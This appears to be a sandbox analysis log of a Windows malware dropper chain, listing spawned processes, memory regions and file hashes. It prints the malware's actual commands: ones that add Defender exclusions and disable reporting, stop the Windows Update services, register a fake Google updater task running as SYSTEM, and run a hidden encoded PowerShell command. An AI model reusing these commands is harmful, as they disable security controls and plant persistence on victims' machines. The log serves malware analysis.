C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\7Zm5kJ78.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\7Zm5kJ78.exe

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\26CD.tmp\26CE.tmp\26CF.bat C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\7Zm5kJ78.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/login

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x16c,0x170,0x174,0x148,0x178,0x7ffc0b8e46f8,0x7ffc0b8e4708,0x7ffc0b8e4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ffc0b8e46f8,0x7ffc0b8e4708,0x7ffc0b8e4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ffc0b8e46f8,0x7ffc0b8e4708,0x7ffc0b8e4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2124,11479124697320355733,4943036712694769783,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2220 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2140,13066858964225448386,12215929807450836498,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2152 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2140,13066858964225448386,12215929807450836498,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2204 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2124,11479124697320355733,4943036712694769783,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2720 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2124,11479124697320355733,4943036712694769783,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2140 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2124,14973337550866805478,9103256636975688907,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2188 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2124,14973337550866805478,9103256636975688907,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2136 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,11479124697320355733,4943036712694769783,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3388 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,11479124697320355733,4943036712694769783,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3364 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,11479124697320355733,4943036712694769783,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4264 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,11479124697320355733,4943036712694769783,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3392 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,11479124697320355733,4943036712694769783,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4032 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,11479124697320355733,4943036712694769783,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4088 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Users\Admin\AppData\Local\Temp\5464.exe

C:\Users\Admin\AppData\Local\Temp\5464.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\uy2bJ6yf.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\uy2bJ6yf.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\ed0Mr9BE.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\ed0Mr9BE.exe

C:\Users\Admin\AppData\Local\Temp\58CA.exe

C:\Users\Admin\AppData\Local\Temp\58CA.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\qm8Nc7tt.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\qm8Nc7tt.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\vx5hU8bR.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\vx5hU8bR.exe

C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1Dj81PS4.exe

C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1Dj81PS4.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7B48.bat" "

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/login

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffc0b8e46f8,0x7ffc0b8e4708,0x7ffc0b8e4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,11479124697320355733,4943036712694769783,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6108 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xdc,0x108,0x7ffc0b8e46f8,0x7ffc0b8e4708,0x7ffc0b8e4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,11479124697320355733,4943036712694769783,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6188 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\7CCF.exe

C:\Users\Admin\AppData\Local\Temp\7CCF.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,11479124697320355733,4943036712694769783,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6192 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\8A3E.exe

C:\Users\Admin\AppData\Local\Temp\8A3E.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 208 -p 5376 -ip 5376

C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2Go001xH.exe

C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2Go001xH.exe

C:\Users\Admin\AppData\Local\Temp\924D.exe

C:\Users\Admin\AppData\Local\Temp\924D.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5376 -s 540

C:\Users\Admin\AppData\Local\Temp\9675.exe

C:\Users\Admin\AppData\Local\Temp\9675.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,11479124697320355733,4943036712694769783,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7224 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,11479124697320355733,4943036712694769783,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7204 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2124,11479124697320355733,4943036712694769783,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7668 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2124,11479124697320355733,4943036712694769783,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7668 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,11479124697320355733,4943036712694769783,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6808 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,11479124697320355733,4943036712694769783,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6940 /prefetch:1

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2124,11479124697320355733,4943036712694769783,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=7184 /prefetch:8

C:\Users\Admin\AppData\Local\Temp\EF25.exe

C:\Users\Admin\AppData\Local\Temp\EF25.exe

C:\Users\Admin\AppData\Local\Temp\F0BC.exe

C:\Users\Admin\AppData\Local\Temp\F0BC.exe

C:\Users\Admin\AppData\Local\Temp\F282.exe

C:\Users\Admin\AppData\Local\Temp\F282.exe

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\setup.exe

"C:\Users\Admin\AppData\Local\Temp\setup.exe"

C:\Users\Admin\AppData\Local\Temp\FAEF.exe

C:\Users\Admin\AppData\Local\Temp\FAEF.exe

C:\Users\Admin\AppData\Local\Temp\7zSFBEF.tmp\Install.exe

.\Install.exe

C:\Users\Admin\AppData\Local\Temp\kos4.exe

"C:\Users\Admin\AppData\Local\Temp\kos4.exe"

C:\Users\Admin\AppData\Local\Temp\latestX.exe

"C:\Users\Admin\AppData\Local\Temp\latestX.exe"

C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe

"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"

C:\Users\Admin\AppData\Local\Temp\is-6T50F.tmp\LzmwAqmV.tmp

"C:\Users\Admin\AppData\Local\Temp\is-6T50F.tmp\LzmwAqmV.tmp" /SL5="$60256,6502186,54272,C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"

C:\Program Files (x86)\Drive Tools\zDriveTools.exe

"C:\Program Files (x86)\Drive Tools\zDriveTools.exe" -i

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\system32\schtasks.exe" /Delete /F /TN "Z1026-1"

C:\Program Files (x86)\Drive Tools\zDriveTools.exe

"C:\Program Files (x86)\Drive Tools\zDriveTools.exe" -s

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\system32\schtasks.exe" /Query

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 5744 -ip 5744

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5744 -s 572

C:\Users\Admin\AppData\Local\Temp\7zSFE22.tmp\Install.exe

.\Install.exe /MKdidA "385119" /S

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\AppData\Local\Temp\3FD9.exe

C:\Users\Admin\AppData\Local\Temp\3FD9.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"

C:\Windows\SysWOW64\cmd.exe

/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&

C:\Windows\SysWOW64\cmd.exe

/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gaNnjgOTJ" /SC once /ST 01:47:08 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gaNnjgOTJ"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

Network


Files


memory/5244-339-0x0000000074890000-0x0000000075040000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 285252a2f6327d41eab203dc2f402c67
SHA1 acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6
SHA256 5dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026
SHA512 11ce7cb484fee66894e63c31db0d6b7ef66ad0327d4e7e2eb85f3bcc2e836a3a522c68d681e84542e471e54f765e091efe1ee4065641b0299b15613eb32dcc0d

memory/5244-343-0x0000000006FA0000-0x0000000006FB0000-memory.dmp

memory/5340-347-0x00000000004A0000-0x00000000004AA000-memory.dmp

memory/5340-348-0x0000000074890000-0x0000000075040000-memory.dmp

memory/5376-351-0x0000000000400000-0x0000000000434000-memory.dmp

memory/5376-350-0x0000000000400000-0x0000000000434000-memory.dmp

memory/5376-354-0x0000000000400000-0x0000000000434000-memory.dmp

memory/5564-369-0x0000000000200000-0x000000000023E000-memory.dmp

memory/5564-371-0x0000000074890000-0x0000000075040000-memory.dmp

memory/5564-372-0x00000000071F0000-0x0000000007200000-memory.dmp

memory/5244-380-0x0000000074890000-0x0000000075040000-memory.dmp

memory/5736-381-0x0000000000400000-0x000000000047E000-memory.dmp

memory/5736-391-0x00000000006F0000-0x000000000074A000-memory.dmp

memory/5736-397-0x0000000074890000-0x0000000075040000-memory.dmp

memory/5340-398-0x0000000074890000-0x0000000075040000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 92ae4c82aa2d40b5ce662b0684eaec5e
SHA1 1dd0608c3a2f87b6fb5eafb7ce52707a12d91445
SHA256 8ae2a81c2cfa4d825876b040194d1a549a5f8bb6840b5109ec3a2ddffed6a87b
SHA512 001860540165ae0e473bbb0c534fb6c07afeda4733eebce7d269079058306eeccbe77156bf8842c3d612655e9ca64bc7d7c81b00c34abd0759303ed81ebbb1a1

memory/5564-408-0x0000000074890000-0x0000000075040000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 ada96af5b3c5d35dbd74733023057505
SHA1 773b0d2e93b28daf469cd104d517450137caed34
SHA256 f2671700177bac09b4eec2c8287ee1b71f67b21d8286fec302e7f55b3731f585
